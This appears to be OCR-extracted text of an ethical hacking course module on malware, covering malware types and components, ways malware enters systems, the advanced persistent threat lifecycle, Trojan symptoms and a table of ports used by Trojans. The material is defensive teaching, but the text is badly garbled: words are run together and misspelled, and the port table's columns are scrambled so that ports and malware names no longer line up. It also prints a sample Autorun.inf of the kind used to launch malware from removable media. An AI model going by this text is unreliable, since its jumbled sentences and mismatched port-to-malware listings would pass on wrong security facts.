with various softwareprotection were discussed
In thenext module,
we will discuss
in detailthevarious malware
threats.
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
Certified Ethical Hacker
Module07:
MalwareThreats
Module Objectives
Advanced
Understanding PersistentThreats(APTS)
andthe Ufecyce
‘overview
of Trojans,
Thee
Types,and HowtheyinfectSystems
of
‘overview
Vewes,
TherTypes,
of Computer
‘overview
andHow
They
infecles
WormsandFieess Malware
the MalwareAnalysis
Understanding Process
Understanding
Difrent Malware
Countermeasures
Module Objectives
The primary objectivesof this moduleare to provide
knowledge
aboutvarious typesof
malwareand to illustratehow to performmalwareanalysis.
Thismodulepresentsdifferent
typesof Trojans, backdoors,viruses, andworms, explains howtheyworkandpropagate or
spread o n the Internet,
describes their symptoms,anddiscusses their consequencesalong with
various malwareanalysis techniques suchas static anddynamic malwareanalysis. It also
discusses differentwaysto protectnetworksor system resources frommalwareinfection,
At theendof this
Describe
module,
willable
to:
you
the concepts
be
techniques
of malware andmalwarepropagation
=
theconcepts
Describe ofadvanced threats(APTS)
persistent andtheir lifecycle
=
Describe of Trojans,
the concepts andhow theyinfectsystems
their types,
Explain of viruses,
the concepts their types,andhowtheyinfectfiles
Explain
the
Explain
concept
of computer worms
of filelessmalwareandhowtheyinfectfiles
the concepts
Perform
malwareanalysis
Explain
differenttechniques
to detectmalware
Adopt
countermeasuresagainstmalware
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
©Fetanconcepts Ceuntroeatsres
e Virus and
Worm
Concepts Anti-MalwareSoftware
Malware Concepts
To understandthe various typesof malwareand their impacto n networkand system
resources, we will begin
with a discussion
of the basicconcepts
of malware.Thissection
describesmalwareand highlights the common techniques usedbyattackersto distribute
malwareon theweb.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Introductionto Malware
s malware
{©Malware malicious
forthe
ofthesystems
to the
thatdamages
software
crestor
or dlsables
purpose
computer and
systems
oftheftor fraud gives
limitedo ull contol
Examples
of Malware
Ransomware
Introduction to Malware
Malwareis malicioussoftwarethat damages or disables
computer
systems andgives limitedor
adware,
of
fullcontrol the systemsto themalware
Malwareincludesviruses,worms, Trojans,
scareware, crapware,roughware,
creatorformalicious
crypters,
activitiessuchas theftor fraud.
rootkits,backdoors,
botnets, ransomware, spyware,
etc. Thesemay delete files,
keyloggers,
slowdowncomputers, stealpersonalinformation,sendspam,or commit fraud.Malwarecan
perform
variousmaliciousactivities rangingfrom simple
emailadvertising
to complex
identity
theft andpassword
stealing,
Malwareprogrammers develop
anduse malwareto:
+
Attackbrowsers
andtrackwebsitesvisited
+
anddegrade
Slowdownsystems performance
system
*
Causehardwarefailure,
rendering inoperable
computers
+
stealpersonal
information,
including
contacts
Erasevaluableinformation,
resulting
i n substantial
dataloss
Attackadditional
computer
inboxeswithadvertising
‘Spam
directly
systems
emails
froma compromised
system
ical andCountermensores
Mackin ©by E-Comel
Copyright
DifferentWays
for Malwareto Enter a System
roraletarimnemdaenotiedeses
|| tra atacrnens
DifferentWays
for Malware to Entera System
InstantMessenger
Applications
applications
Infectioncan occur via instant messenger suchas FacebookMessenger,
WhatsApp Messenger, LinkedinMessenger,
Google
Hangouts, Usersare at high
or ICQ.
100%sure of
example, who is at the other end
if you receive a file through
person suchas Bob,
of the connection at any particular
an instant messenger application
moment. For
froma known
you will tryto open andview the file. Thiscouldbe a trick whereby
an attacker whohashacked Bob'smessenger ID andpassword wants to spread Trojans
across Bob'scontactslistto trapmore victims.
PortableHardwareMedia/Removable
Devices
© Portablehardwaremediasuchas flashdrives, CDs/DVDs, andexternalharddrives
canalso injectmalwareinto a system. A simpleway of injectingmalwareinto the
targetsystemis through physicalaccess. For example, if Bob can access Alice’s
systemin her absence, then he can installa Trojan
bycopyingthe Trojan software
fromhisflashdrive onto herharddrive.
‘Another
means of portable media malwareinfectionis through the Autorun
or Autostart,
function.Autorun,alsoreferredto as Autoplay is aWindowsfeature
that,if enabled,
runs an executableprogramwhen a user inserts a CD/DVD i n the
DVD-ROM trayor connects a USBdevice.Attackerscan exploitthisfeatureto run
malwarealong with genuineprograms.They placea n Autorun.inffile with the
malwarein a CD/DVDUSB
ordevice andtrick people
or it
into inserting plugging into
ical andCountermensores
Mackin ©by E-Comel
Copyright
their systems. Becausemany people are not aware of the risksinvolved, their
machinesa re vulnerableto Autorun malware,The followingis the content of an
inffile
‘Autorun
[autorun)
openssetup.exe
icon=setup.exe
To mitigatesuch infection, turn off the Autostart functionality.
Follow the
instructions belowto turn offAutoplay i n Windows
10:
1, ClickStart. Type
2. If you are prompted
in
gpedit.msctheStartSearchbox,andthen
for an administratorpassword
press
ENTER.
or confirmation,
typethe
password, or click
Allow.
UnderComputer Configuration,expand Templates,
Administrative expand
WindowsComponents,
andthenclickAutoplay
Poli
In the Detailspane,double-click
ClickEnabled,
Turn
off
Autoplay.
andthen selectAll drivesi n theTurnoffAutoplay
boxto disable
on
‘Autorunall drives.
6. Restart the computer.
BrowserandEmailSoftware
Bugs
Outdatedweb browsers oftencontain vulnerabilitiesthat can posea majorriskto the
A visit to a malicioussite fromsuchbrowsersc an automatically
user'scomputer. infect
themachinewithoutdownloading or executing anyprogram.Thesamescenario occurs
while checking
e-mailwith OutlookExpress
or some other softwarewith well-known
problems.Again,it may infectthe user'ssystemwithout even downloading an
attachment.Toreducesuchrisks,always
use the latestversion of the browserand e-
mailsoftware.
InsecurePatchmanagement
Unpatched
softwareposesa highrisk.UsersandIT administrators
do not update
their
application and manyattackerstake advantage
softwareas often as theyshould, of this
well-knownfact. Attackerscan exploitinsecure patchmanagement byinjectingthe
softwarewith malwarethat can damage the datastoredon the company’s
systems. This
process breaches,
c an leadto extensive security ofconfidential
suchas stealing filesand
company credentials.Someapplications that were found to be vulnerableand were
patched
1083),
recently includeMicrosoft
Microsoft Exchange
{CVE-2019-1118), Docker
Office(CVE-2019-1084),
Server(CVE-2019-1136), .NET
Framework
Microsoft Graphics
flaw i n Azure(CVE-2018-15664), Microsoft
(CVE-2019-
Component
SQLServerRCE
(CVE-2019-1068), andRDPRCE(CVE-2019-0887). Patchmanagement must be effective
in threats,andit
mitigating is vital to andregularly
applypatches updatesoftware
programs.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Rogue/Decoy
Applications
Attackerscan easily lure a victim into downloadingfree applications/programs.
Ifa free
programclaimsto be loadedwith featuressuchas a n addressbook,access to several
POP3accounts,and other functions, manyusers will be tempted
to try it. POP3 (Post
OfficeProtocolversion 3)is an emailtransferprotocol.
© If a victim downloads freeprogramsandlabelsthem as TRUSTED, protection
softwaresuchas antivirus softwarewill fal to indicatethe use of new software.In
this situation, an attackerreceives an email,POP3account passwords, cached
passwords, andkeystrokesthrough emailwithout being noticed.
Considera n example
Attackersthrive on creativity. i n whichan attackercreates a
fakewebsite(say, Audiogalaxy) fordownloading MP3s.He or shecouldgenerate
sucha site using 15 GBof space for the MP3sand installing any other systems
to
neededcreate the illusionof a website,
are merelydownloading
asa backdoor
Thiscan foolusers into thinking
fromothernetworkusers. However,
andinfectthousands
of naive users.
thatthey
thesoftwarecouldact
ical andCountermensores
Mackin ©by E-Comel
Copyright
software
beforedownloading a websitelooksprofessional
them,Justbecause does
not mean that itis safe.
> Always downloadpopular softwarefrom its original (orofficially
dedicatedmirror)
siteswith linksto the (supposedly)
site,andnot fromthird-party samesoftware.
ical andCountermensores
Mackin ©by E-Comel
Copyright
FileSharing.
If NetBIOS(Port139),FTP(Port 21),SMB(Port145),etc.,o n a systemare openfor file
sharingor remote execution, they
can be usedbyothersto
allowattackersto installmalwareandmodify files.
system access
the system.
Thiscan
ical andCountermensores
Mackin ©by E-Comel
Copyright
CommonTechniques
AttackersUse to Distribute Malware
on the Web
esina
Search
| Ee hgh
malwarepages
nankng searchresus
Matvrtsing Embedding
matwaein ad-networkshat dsl aot hundredso f gina, ih-traf tes
| Explating
oftware
malware
Drive-byDownloads
jst fw in bowser tonal by vestingweb
pe
CommonTechniques
AttackersUseto Distribute Malware on the Web
Source:Security (http://www.sophos.com)
ThreatReport
Somestandardtechniques
usedto distributemalwareon the webare as follows
=
SEO) hat
Black Search Engine
uses aggressive
pageswapping,andadding
Optimization
(SEO): Blackhat SEO(also
SEOtactics suchas keyword
unrelatedkeywords
stuffing,
to get higher
referredto as unethical
doorway
inserting pages,
searchenginerankingsfor
malwarepages.
SocialEngineered Click-jacking:
Attackersinjectmalwareinto websitesthat appear
legitimate
into
to trick users clicking
link executes withoutthe knowledge
them.Whenclicked, the malwareembeddedin the
of
or consent the user.
Compromised
LegitimateWebsites:Often,attackersuse compromised
websitesto
infectsystems
with malware.Whenan unsuspecting
user visits the compromised
he/she
website, installsthe malwareo n his/her
unknowingly after whichthe
system,
malwareperforms
malicious
activities.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Drive-by Thisrefersto the unintentionaldownloading
Downloads: of softwarevia the
Internet. Here, an attackerexploits flaws i n browsersoftwareto install malwareby
merely visitinga website.
‘Spam
Emails:Theattackerattachesa maliciousfile to an emailandsendsthe emailto
multiple targetaddresses. Thevictim is tricked into clickingthe attachmentandthus
executes the malware, therebycompromising his/hermachine.Thistechnique is the
most common methodcurrently i n use byattackers. In additionto emailattachments,
an attacker
mayalsouse theemail
to
body embedthemalware.
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Malware
Components
3
software
malware
requirement
mahwae
depend
designe
on the
specie ofthe authorwho it fora
of Malware
Components
Malwareauthorsandattackerscreate malwareusingcomponents that can helpthemachieve
their goals.
They deletedata,change
c an use malwareto steal information, systemsettings,
provide or merely
access, and occupyspace.Malwareis capable
multiply of propagating
and
functioning secretly.
Someessential of most malwareprograms
components are as follows:
*
It is a softwareprogramthat can concealthe existence of malware.Attackers
Crypter:
use this software to elude antivirus detection.It protectsmalwarefrom reverse
engineeringor analysis, thusmaking it dificult to detectbysecuritymechanisms.
Downloader:It is a typeof Trojan that downloadsother malware(or)maliciouscode
and filesfrom the Internet to a PCor device.Usually, attackersinstall a downloader
whentheyfirst gainaccess to a system.
Dropper: It is a covert carrier of malware.Attackersembednotorious malwarefiles
insidedroppers, whichcan perform the installationtaskcovertly. Attackersneedto first
installthe malwareprogramor codeon the system to executethe dropper. Thedropper
can transport malwarecodeand execute malwareon a targetsystemwithout being
detectedbyantivirus scanners
Exploit:
It is the partthe malwarethat contains codeor a sequenceof commands
that
can take advantage
of a bugor vulnerability
in a digital or device.Attackersuse
system
suchcode to breachthe system's securitythrough
softwarevulnerabilitiesto spy on
information
or to installmalware.Basedon the typeof vulnerabilitiesabused,
exploits
are categorized
into localexploits
andremote exploits.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Injector:Thisprograminjectsexploitsor maliciouscodeavailable
i n the malwareinto
other vulnerablerunning processesand changes the methodof execution to hide or
preventits removal.
Obfuscator: It is a programthat conceals the maliciouscodeof malwarevia various
techniques, thusmaking it difficultfor security
mechanisms to detector remove it.
Packer:Thissoftwarecompressesthe malwarefile to convert the codeanddataof the
malwareinto an unreadableformat. It uses compressiontechniques to packthe
malware.
Payload:Itis the partof the malwarethat performs the desiredactivity
whenactivated
It may be usedfor deleting or modifying files,degrading the systemperformance,
ports,changing
‘opening settings,etc.,to compromise system security.
a pieceof codethat definesthe basicfunctionality
Malicious Code:This is of the
malwareand comprises
commandsthat result in security
breaches.It can take the
following
forms:
©
Java
Applets
ActivexControls
© BrowserPlug-ins
© PushedContent
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
©Fetanconcepts Ceuntroeatsres
e Virus and
Worm
Concepts Anti-MalwareSoftware
APT Concepts
Advanced as they
persistentthreatsare a major securityconcern for any organization,
representthreats to the organization’s
assets,resources, financial records,
and other
data.APT attackscan damage
confidential the reputation byrevealing
of an organization
sensitive data,Thissectiondiscusses andlifecycle.
APTsas well as their characteristics
ical andCountermensores
Mackin ©by E-Comel
Copyright
What are AdvancedPersistentThreats?
(©Advanced threats
persistent (APT)
ae defined
2s
2typeof
network
attacker
gain
attack,where
an unauthorized
(©.
Themain
objectivebehind
these
attackito obtalnsenkive
the
information
ratherthansabotagingorganization
‘What
are AdvancedPersistentThreats?
‘An threat is definedas a typeof networkattackwhereby
advancedpersistent an attackergains
unauthorized
accessto a target networkandremains i n thenetworkwithoutbeingdetected for
a longtime. Theword “advanced―
signifies
the use of techniques
to exploit
the underlying
vulnerabilities
(C&C)
The word“persistent―
in the system.
systemthat continuously
signifies
“threat―
signifies
theexternalcommand-and-control
extracts the dataand monitors the victim'snetwork.Theword
humaninvolvementi n coordination.APT attacksare highly sophisticated
attackswhereby an attackeruses well-craftedmaliciouscode along with a combinationof
multiple zero-day exploitsto gain access to the targetnetwork.Theseattacksinvolvewell
planned and coordinatedtechniques whereby attackerserase evidenceof their malicious
activities after their objectiveshave been fulfilled. APT attacksare usuallyperformed on
organizations possessing valuable information, such as financial, defenseand
healthcare,
aerospace,manufacturing, andbusiness Themain objective
organizations. of theseattacksis to
obtainsensitive information ratherthansabotaging theorganization
andits network.
Informationobtainedbyan attackerthrough
APTattacksincludes:
Classified documents =
Transaction
information
User
or
Employee's
information personal
customer's Organization's =
information
business
strategy
Networkinformation Controlsystem
access information
ical andCountermensores
Mackin ©by E-Comel
Copyright
Characteristicsof Advanced PersistentThreats
Conjecties | obtaining
sense
ntermation
rei
oui pail gots
RineTa
upto
which
aftack
remains
undetected
inthe
tartevel the network
(OS) aon
Specite
Warning Signs eraser ane pad asl atone ety ee
Characteristicsof AdvancedPersistentThreats
APTS basedon whichattackerscan design
havevarious characteristics andplantheir activities
to launchan attack.According
successfully to security Dr. Max Kilger,
SeanBodmer,
researchers
JadeJones,
andGregory
Carpenter, characteristics
some key ofAPTSare as follows:
ical andCountermensores
Mackin ©by E-Comel
Copyright
Objectives
The main objective of any APTattackis to repeatedly
obtain sensitive informationby
gainingaccess to the organization's
networkfor illegal
earnings.Anotherobjective of an
APTmaybe spyingfor political goals.
or strategic
Timeliness
It refers to the time taken by an attackerfrom assessingthe targetsystemfor
vulnerabilities
Resources
to exploiting
to
themto gainandmaintain access the targetsystem,
RiskTolerance
It is definedas the level up to whichthe attackremains undetected i n the target
network.APTattacksare well planned and executedwith proper knowledge of the
target network,whichhelps
SkillsandMethods
themremain undetected for long
i n the network
a time.
Theseare the methodsand toolsused byattackersto perform a certain attack.The
methodsusedfor performingthe attackincludevarious socialengineeringtechniques to
gatherinformationabout the target,techniques to preventdetection by security
mechanisms,andtechniquesto maintain access for a long
time.
Actions
APTattacksfollowa certain numberof technical “actions―
that makethem different
fromothertypesof cyber-attacks.Themain objective
of suchattacksis to maintain their
presence networkfora long
i n the victim's time andextract as muchdataas possible.
AttackOrigination
Points
They
refer
numerous
to the attemptsmadeto gain entryinto the targetnetwork.Such
pointsofentrycan beusedto gainaccessto thenetworkandlaunch furtherattacks.
To
succeedi n gaining initial access,the attackerneedsto conductexhaustiveresearchto
identify
and functions
thevulnerabilities gatekeeper i n thetargetnetwork.
Numbers
Involvedin theAttack
It Is definedas the numberof host systems
involvedin the attack.APTattacksare
performed
usually bya crime groupor crime organization.
Knowledge
Source
It is definedas the gathering
of informationthrough online sources about specific
threats,whichcan befurtherexploited
to performcertain attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Multi-phased
Oneof the importantcharacteristics of APTsis that theyfollow multiple
phasesto
execute an attack.The phases
followed byan APT attackare reconnaissance,access,
discovery, anddataexfiltration
capture,
Tailoredto the Vulnerabilities
Themaliciouscodeusedto execute APT attacksis designed and written suchthat it
vulnerabilities
targetsthe specific in the victim’s
present network.
‘Multiple
Pointsof Entries
Oncea n adversary network,
enters the target he/sheestablishes a connection with the
server to downloadmaliciouscodeforfurtherattacks. In the initialphase of an APT
attack, the adversary
creates multiple
pointsof entrythrough the server to maintain
accesstothe targetnetwork.If one pointof entryis discovered andpatched
bythe
analyst,
security thenthe adversarycan use a differententrypoint.
EvadingSignature-BasedDetectionSystems
APT attacks relatedto zero-day
a re closely exploits,
whichcontain malwarethat has
never been previously
discoveredor deployed. Thus,APTattackscan easilybypass
securitymechanisms suchas firewalls,
antivirus software,
IDS/IPS,
and email spam
filters
Specific
Warning
Signs
APT attacksare usuallyimpossibleto detect.However, some indicationsof an attack
include inexplicable
user account activities,the presenceof a backdoorTrojan for
maintainingaccess to the network, unusualfile transfersand file uploads,unusual
database
activities, etc
ical andCountermensores
Mackin ©by E-Comel
Copyright
AdvancedPersistentThreatLifecycle
AdvancedPersistentThreat Lifecycle
In thecurrentthreat landscape,organizationsneedto pay greater attention to APTs.APTsmay
targeta n organization’s
IT assets, financialassets,intellectualproperty, and reputation.
Commonly used securityand defensivecontrolswill not sufficeto preventsuchattacks.
Attackers behindsuchattacks adapttheirTTPsbased o n the vulnerabilities
andsecurityposture
Thus,theycan evadethe security
of the targetorganization. controlsof the targetorganization.
To launchan APTattack, attackersfollow a certain set of phases and
to target,penetrate,
exploit an organization's
network.Attackers must followeachphase stepbystepto successfully
compromiseandgain access to the targetsystem.
various phases
‘The of the APTlifecycle
are as follows:
1. Prepars
The first phase of the APTlifecycle where an adversary
is preparation, definesthe
target,performs extensive researchon the target,organizes a team,buildsor attains
tools,andperforms tests for detection.APTattacksusually require a highlevel of
preparation,as the adversary cannot riskdetectionbythe target’s
network security.
Additionalresources anddata may be necessarybeforecarryingout the attack.An
attackerneedsto perform highlycomplex beforeexecuting
operations the attackplan
againstthe target
Initial Intrusion
organization.
Thenext phase involvesattempting to enter the targetnetwork.Commontechniques
used for an initial intrusion are sending spear-phishing
emails and exploiting
vulnerabilitieson publicly available servers. Spear-phishing
emails usually
appear
legitimate but theycontain maliciouslinks or attachmentscontaining executable
ical andCountermensores
Mackin ©by E-Comel
Copyright
malware, Thesemaliciouslinkscan redirect
thetargetto thewebsitewherethe target's
web browserand softwareare compromised bythe attackerusingvarious exploit
techniques.Sometimes, an attacker may alsouse socialengineeringtechniques to
gatherinformationfrom the target.After obtaining informationfrom the target,
attackersuse suchinformationto launchfurtherattackson the targetnetwork.In this
phase,maliciouscode or malwareis deployed into the targetsystemto initiate an
‘outbound
connection,
.
Expansion
The primaryobjectives
of this phase
are expanding
accessto the targetnetworkand
obtaining
credentials.If the attacker'sai m is to exploit
and gain access to a single
system,thenthereis no needfor expansion.However,
in most cases,the objective
of an
systemsusinga single
attacker is to access multiple compromised system.In this
scenario, the first stepperformedbyan attackerafter an initialcompromiseis to
expand
access to the target Themain objective
systems. of the attackeri n this phase
is
to obtain administrativelogincredentials to escalateprivileges andto gain further
access to the systems i n the network. For this purpose, the attackertries to obtain
privileges
administrative forthe initial targetsystemfromcached credentialsanduses
thesecredentialsto gain and maintain access to other systems i n the network.When
attackers
are unable to obtainvalidcredentials,theyu se othertechniques suchas social
engineering, exploiting
vulnerabilities,
and distributing
infectedUSBdevices.After the
attackerobtainsthe target’s
account credentials,it is difficultto track his/her
movement in the network,as he/she
uses a legitimate
username andpassword.
ical andCountermensores
Mackin ©by E-Comel
Copyright
and
5. Search Exfiltration
In this phase,an attackerachieves the ultimategoalof networkexploitation, whichis
generallyto gainaccess to a resource that can beusedfor performing furtherattacksor
usingthat resource for financialgain. In general, attackerstargetspecificdata or
documentsbefore launching an attack.However, i n some cases, althoughattackers
including
data
determinethatcrucial are availablein the targetnetwork,
importantdocuments, emails,shared
ofthe
theyare unaware
locationof thedata. Acommon methodfor searchandexfiltrationis to stealallthe data
drives,and othertypesof datapresent
o n the target network. Data can also be gathered usingautomatedtools suchas
network sniffers.Attackersuse encryption techniques to evadedatalossprevention
{DLP) technologiesi n the targetnetwork.
-
Cleanup
Thisis thelast phase,
wherean attackerperforms
certain actionsto preventdetection
and remove evidenceof compromise. Techniques usedbythe attackerto cover his/her
tracksincludeevadingdetection, eliminating
evidence andhiding
of intrusion, the target
of the attack and attackerdetails.In some cases, these techniques also include
manipulatingthe datai n the target analysts.
environment to misleadsecurity
It forattackers
is imperative makethe systemappearas it was beforetheygained
to
access the network.Therefore,
to it and compromised it is essentialfor an attackerto
cover bysecurity
tracksandremain undetected
his/her analysts. can change
Attackers
any file attributesbackto their original
state. Informationlisted,
suchas file size and
date,isjustattributeinformation
containedi n thefile.
Cleanup
Searchand Exfiltration
Initial Intrusion
Persistence Deployment of
—
Expansion
Figure
71:
Advanced
Persistent
Threat
Lifecycle
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
‘Malware
ConceptsFiloloss MalwareConcepts
MalwareAnalysis
‘Trojan
Concepts Countermeasures
Virus and
Worm
Concepts Anti-MalwareSoftware
TrojanConcepts
the basic
In this section,w e will discuss of Trojans
concepts to understandvarious Trojans
and
backdoorsas well as their impacton networkand systemresources. Thissection describes
and
Trojans
various highlights
methodsadopted
maliciousactivities.
their purpose,symptoms, and common portsused.It alsodiscusses
byattackersto installTrojans
the
and perform
to infecttargetsystems
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is a Trojan?
ssabling
of
Indeations
ofa Tojn attacki ncludeabnormal andnetwork
system activitess uch
antrus andredirection
to unknown pages
fortransfering
sensitivedata
Whatis a Trojan?
According
to ancient Greekmythology,
the Greekswon the Trojan
Warwith the aid of a giant
woodenhorsethat was builtto hidetheirsoldiers.TheGreeks left thishorsei n frontof the
of
gates Troy.TheTrojans
left beforeapparently
thought
withdrawing
that the horsewas a giftfromthe Greeks,
fromthe war and brought
Greeksoldiersbrokeout of thewoodenhorseandopened
whichtheyhad
it into theircity.At night, the
the citygatesto let in the rest of the
Greekarmy,who eventually
destroyed
the cityof Troy.
bythisstory,a computer
Inspired is a programin whichmalicious
Trojan or harmfulcode is
containedinsidean apparently
harmlessprogram or data,whichcan later gain controland
cause damage,suchas ruining the file allocationtable on your harddisk.Attackersu se
computer Trojans
to trickthe victim into performing
a predefined
action. Trojans
are activated
uponusers’ predefined
specific actions suchas unintentionally
installing
a malicioussoftware,
clicking
on a maliciouslink,etc., and upon activation,
theycan grantattackersunrestricted
access to all the datastoredon the compromised informationsystem and causepotentially
severe damage. Forexample,userscoulddownloada filethat appears
to be a movie, but,when
executed, unleashesa dangerous programthat erases the hard drive or sendscredit card
numbersandpasswords to theattacker,
ATrojanis wrappedwithinor attachedto a legitimateprogram,meaningthat the programmay
havefunctionality
that is not apparent to the user. Furthermore, attackers
u se victims as
unwittingintermediariesto attackothers.Theyc an use a victim'scomputerto commit illegal
DoSattacks.
Trojans
transmit information,
programsthat provide
as thevictims. Forexample,
workat thesame levelofprivileges
to deletefiles, modify a
if victim hasprivileges
existingfiles,and installother programs (such
unauthorizednetworkaccessandexecute privilege
elevationattacks),
as
ical andCountermensores
Mackin ©by E-Comel
Copyright
once infectsthat system,it will possess
the Trojan the same privileges. Furthermore, it can
attemptto exploit vulnerabilitiesto increase the levelof access even beyond the user running
it, f successful,
theTrojan can use suchincreased privilegesto installothermaliciouscodeon
the
victim’s
‘A
machine.
compromised systemcan affect other systems o n the network. Systems that transmit
authenticationcredentialssuchas passwordsover sharednetworksi n cleartext or a trivially
encrypted
form are particularly
vulnerable.If an intruder compromises
a systemon sucha
he or shemay be ableto recordusernames and passwords
network, or other sensitive
information.
Additionally,
a Trojan, depending on the actions it performs,
mayfalsely implicatea remote
systemas the source of an attackbyspoofing, therebycausingthe remote systemto incur a
liability. enter the system
Trojans
messages.
bymeans suchas email
attachments,
downloads, and instant
Indicationsof Trojan
Attack
Thefollowing
‘=
computermalfunctions
are indications
of Trojan
TheDVD-ROMdraweropensandclosesautomatically
a
attack:
=
flipsupside-down,
Thecomputerscreen blinks, or is invertedso that everything
is
displayed
backward.
The default background or wallpaper change
settings automatically.This can be
performed either on the user’s
usingpictures or in the attacker's
computer program.
Printersautomatically
start printingdocuments.
Webpagessuddenly open without inputfromthe user.
Thecolorsettings
of the operatingsystem (0S)
change automatically
convert to a personal
Screensavers scrolling
message.
Thesoundvolumesuddenly
fluctuates.
Antivirusprograms are automatically
disabled,
andthe data are corrupted,
altered,
or
deletedfromthesystem,
Thedateandtime of the computer
change.
Themousecursor moves byitself.
Theleft-andright-click
functionsof themouse are interchanged.
Themouse pointer completely.
disappears
Themouse pointerautomatically
clicks
o n icons andis uncontrollable.
TheWindowsStartbuttondisappears.
Pop-ups
with bizarremessages suddenly appear.
Clipboard
images and text appear to be manipulated,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thekeyboard
andmouse freeze.
Contactsreceive emailsfroma user'semailaddressthatthe user did not send.
Strange
warnings boxesappear. Often, these are personal
or question messages
at theuser, asking
directed to answer byclicking
that requirehim/her
questions a Yes,
No,
or
OK
Thesystem
button.
turns off andrestarts i n unusualways.
disappears
Thetaskbar automatically
TheTaskManageris disabled.
Theattackeror Trojan
may disablethe TaskManager
functionso that the victim cannot view the tasklist or endthe taskon a givenprogram
or process.
72:
Figure
Oingram
showing
the
attacker
extracts
the
how information from vit sytem
ical andCountermensores
Mackin ©by E-Comel
Copyright
HowHackersUseTrojans
Dette
(©
orepiace
operrtingrewals
ciel stem les able ad antvins
Use end
{©
basting
ema
victor spamming
ts
(@Encrypt kta vck
one
ncce
How HackersUseTrojans
Attackerscreate maliciousprograms suchas Trojans
forthe following
purposes:
+
Deleteor replace OS'scriticalfiles
*
Generate
fake
traffic
to
perform
Record screenshots,
DoS
andvideoofvictim’s
audio, PC
attacks
+
Use
victim’s
PCfor spammingandblasting
Downloadspyware, adware,
email messages
andmaliciousfiles
Disablefirewallsandantivirus
Createbackdoors
to gainremote access
PCasa proxyserver forrelaying
Infectthe vietim’s attacks
PCasa botnetto perform
Usethevictim’s DDoS
attacks
Steal
sensitive
©
such
as: information
Credit card information,
which is usefulfor domain registration
as well as for
shopping usingkeyloggers
Accountdata such as email passwords, dial-uppasswords,
and web service
passwords
©
Important
Encrypt
company
projects,
including
thevictim'smachine
and
and
presentations
the
prevent victim from
work-relatedpapers
themachine
accessing
Usethe targetsystem
as follows:
ical andCountermensores
Mackin ©by E-Comel
Copyright
To store archives of illegal
materials,suchas childpornography. The target
continues usinghis/her
systemwithout realizing
that attackersa re usingit for illegal
activities
© AsanFTPserver for pirated software
Script
kiddiesmay justwant to havefun with the targetsystem; an attackercouldplant
a Trojani n the systemjust to makethe systemact strangely (e.g., the CD\DVD tray
andclosesfrequently,
‘opens the mouse functionsimproperly, etc.)
Theattackermight use a compromised systemfor other illegal
purposes suchthat the
targetwould be held responsible if theseillegalactivities are discovered by the
authorities
ical andCountermensores
Mackin ©by E-Comel
Copyright
CommonPortsused byTrojans
PortTrojan
myno(ias eo se Ina
Trojan
Suse
CommonPortsusedbyTrojans
Portsrepresent the entryandexit pointsof datatraffic.Thereare two typesof ports:hardware
portsandsoftware ports.PortswithintheOSare software ports, andthey a re usually
entryand
exit pointsfor application traffic (e.g.,port 25 is associatedwith SMTPfor e-mail routing
betweenmailservers). Manyexisting portsare application-specific or process-specific. Various
Trojansusesome of theseportsto infecttargetsystems,
Users needa basicunderstanding of the state of an "activeconnection― and portscommonly
usedbyTrojans to determinewhether a system hasbeencompromised.
‘Among
the various states, the “listening―
state is the important one i n thiscontext. Thesystem
generates this state when it listensfor a portnumberwhile waiting to connect to another
system, Whenevera system reboots, Trojans move to the listening state;some usemore than
data
one port:one for
Trojans
andthe other(s)
are listedi n the tablebelow.
for
by
transfer.Commonportsused different
443Emotet
20/22/80/
21/3024)Wincrash
| 5321 FireHoteker
BladeRunner/Blade
|
4092/5742
|
BladeRunner,DolyTrojan,
InvisibleFTP,
WebEx,
Fore,
WinCrash,
5400-02
Robo-Hack
Alpha
gunner 0.80
DarkFTP
ical andCountermensores
Mackin ©by E-Comel
Copyright
Shaft, LinuxRabbit
SSHRAT,
TinyTelnetServer,EiteWrap
EmailPasswordSender,
‘Antigen,
Terminator,
WinPC, WinSpy, Haebu
Coceda,ShtrilitzStealth,Terminator, kilerRat,HoudiniRAT
Kuang20.17A-0.30,Jesrto, Lazarus
Group,Mis-Type, NightDragon
26 BadPatch
|
6667/12349Bionet,Magic
Hound
|
31/456 HackersParadise
Denis,
Ebury,FIN7,LazarusGroup,
6670-71
| Deepthroat
53 Threat Group-3390,
RedLeaves,
Trooper
Tropic GateCrasher,
Priority
Mspy RemoteGrab
Necurs, Ismdoor,
NetWire, PoisonIvy,
Executer,
Codered,APT18,APT19,APT
32,BBSRAT,Calisto,
Carbanak,Carbon,
Comnie,Empire,FIN7,
InvisiMole, NetMonitor
LazarusGroup,MirageFox,
Mis-Type,
Misdat,
Dragon,
POWERSTATS,
ThreatGroup-3390,
Type,
Night
Mivast,MoonWind,
RedLeaves,
5
UBoatRAT
Shiver 7300/3138,
131339
Nuker,Dragonfly
2.0, 7397
TCP
Wrappers Trojan 7626
APT
APT
3,
‘ADVSTORESHELL, 29,
33,AuditCred,BADCALL,
APT
BBSRAT,
Comnie, Cardinal
RAT,
Bisonal,Biba, Carbanak,
Derusbi,ELMER,
Empire
FIN7,
FINS,
FELIXROOT,
HARDRAIN,Hi-Zor,
KEYMARALE,
ghOst
RAT,
HOPLIGHT,
LOWBALL,
LazarusGroup,
Misdat,
Mis-Type, MoonWind,Naid,
Nidiran,
Pasam,PlugX,PowerDuke,
POWERTON, Proxysvc,
RATANKBA,
5-Type,
,Threat
RedLeaves, TEMP.Veles
‘Group-3390, Tropic
TrickBot, Trooper,
TYPEFRAME, UBoatRAT
7
Module 862
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Petya,Dragonfly
WannaCry, 2.0 lekiller
HackersParadise BADCALL,
Comnie,
Volgmer
IniKiller,
PhaseZero,StealthSpy Ptakks
Zeus,
APT 37,Comnie,
EvilGrab,FELIXROOT,
FIN7,HTTPBrowser,
SatanzBackdoor,Ripper LazarusGroup,
Magic
Hound,Oceansalt,S
Type,
Shamoon,
Volemer
TYPEFRAME,
1001 Silencer,
WebEx 8443 Nidiran,
